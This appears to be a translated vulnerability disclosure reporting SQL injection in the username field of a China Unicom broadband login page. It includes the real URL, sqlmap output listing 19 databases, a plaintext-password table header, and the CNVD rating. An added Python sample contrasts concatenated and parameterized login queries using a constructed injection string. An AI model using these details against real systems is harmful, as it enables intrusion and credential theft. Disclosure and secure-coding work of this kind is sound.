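2012-11-13: Details reported to the vendor, awaiting vendor handling
2012-11-14: Vendor confirmed; details disclosed only to the vendor
2012-11-24: Details disclosed to core white hats and experts in related fields
2012-12-04: Details disclosed to regular white hats
2012-12-14: Details disclosed to intern white hats
2012-12-28: Details disclosed to the public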
SQL injection in a China Unicom forum, plaintext passwords, instantly flustered
The username can be injected in the POST to http://wlan.bbn.com.cn:8089/n_wlan/admin/login.php?action=login.
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[09:51:22] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Microsoft SQL Server 2005
[09:51:22] [INFO] fetching database names
[09:51:22] [INFO] the SQL query used returns 19 entries
[09:51:22] [INFO] starting 10 threads
[09:51:22] [INFO] resumed: "BBNEduBlog"
[09:51:22] [INFO] resumed: "BBNEduDev"
[09:51:22] [INFO] resumed: "BBNEduGK"
[09:51:22] [INFO] resumed: "BBNEduSearch"
[09:51:22] [INFO] resumed: "EduShop"
[09:51:22] [INFO] resumed: "kaoshi"
[09:51:22] [INFO] resumed: "model"
[09:51:22] [INFO] resumed: "luck"
[09:51:22] [INFO] resumed: "school"
[09:51:22] [INFO] resumed: "schoold"
[09:51:22] [INFO] resumed: "tempdb"
[09:51:22] [INFO] resumed: "TRSWCMV65"
[09:51:22] [INFO] resumed: "WebBlog"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_edu"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_edu_bbs"
[09:51:22] [INFO] resumed: "www_bbn_com_cn_kaoshi"
[09:51:22] [INFO] resumed: "msdb"
[09:51:22] [INFO] resumed: "QuestSoftware"
[09:51:22] [INFO] resumed: "master"
available databases [19]:
[*] BBNEduBlog
[*] BBNEduDev
[*] BBNEduGK
[*] BBNEduSearch
[*] EduShop
[*] kaoshi
[*] luck
[*] master
[*] model
[*] msdb
[*] QuestSoftware
[*] school
[*] schoold
[*] tempdb
[*] TRSWCMV65
[*] WebBlog
[*] www_bbn_com_cn_edu
[*] www_bbn_com_cn_edu_bbs
[*] www_bbn_com_cn_kaoshi
I don't feel like posting the XSS, the admin backend and so on; I just like injection, and I'm a newbie.
Database: luck
Table: dbo.tb1_user
[100 entries]
+------+------------+--------------+
| u_id | u_password | u_username   |
+------+------------+--------------+
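I don't know whether you think you're awesome or what, but you actually store passwords in plaintext. You didn't manage to be awesome, though: someone has already gotten in. I don't know what your engineers are doing. Taking maternity leave?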
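The two flaws reported above (a login field concatenated into a single-quoted SQL string, and passwords stored in plaintext) are shown here next to a hardened login check. This is an added example, not code from the affected site or from the report: in-memory SQLite stands in for the SQL Server back end, the account is constructed, and the u_pwhash column, the function names and the iteration count are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (assumed value)

def hash_password(password: str, salt: bytes = b"") -> bytes:
    """Return salt || PBKDF2 digest; this is what gets stored, never the password."""
    salt = salt or os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

def make_db() -> sqlite3.Connection:
    # In-memory SQLite stands in for the SQL Server back end (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tb1_user (u_id INTEGER PRIMARY KEY, u_username TEXT,"
               " u_password TEXT, u_pwhash BLOB)")
    # Constructed account. u_password mirrors the plaintext column in the report;
    # u_pwhash is the hypothetical replacement column.
    db.execute("INSERT INTO tb1_user VALUES (1, 'alice', 's3cret-pass', ?)",
               (hash_password("s3cret-pass"),))
    return db

def login_concatenated(db, username: str, password: str) -> bool:
    """Flawed pattern: request values pasted into single-quoted SQL literals."""
    sql = ("SELECT u_id FROM tb1_user WHERE u_username = '%s' AND u_password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username: str, password: str) -> bool:
    """Hardened: bound parameter for the lookup, salted-hash check for the password."""
    row = db.execute("SELECT u_pwhash FROM tb1_user WHERE u_username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, digest = row[0][:16], row[0][16:]
    return hmac.compare_digest(hash_password(password, salt)[16:], digest)

if __name__ == "__main__":
    db = make_db()
    quoted = "alice' --"  # constructed input carrying a quote and a comment marker
    print("concatenated accepts quoted input:", login_concatenated(db, quoted, "x"))
    print("parameterized accepts quoted input:", login_parameterized(db, quoted, "x"))
    print("parameterized, correct password:", login_parameterized(db, "alice", "s3cret-pass"))
```

The hardened path never reads u_password, so that column can be dropped once every account has a hash.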
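Severity: High
Vulnerability Rank: 11
Confirmed: 2012-11-14 15:37
CNVD confirmed the vulnerability but did not reproduce it live (the login form no longer exists, the referer and URL are hard to find, and it could not be reproduced with SQLMAP). It has been handed to CNCERT to notify China Unicom Group directly for handling. Scored as a complete impact on confidentiality (whether privilege escalation through SQL Server is possible is unknown): base severity score 7.79, discovery technical difficulty coefficient 1.1, industry or organization impact coefficient 1.4 (broadband user information may be involved), overall rank=7.79*1.0*1.4=10.906
None yet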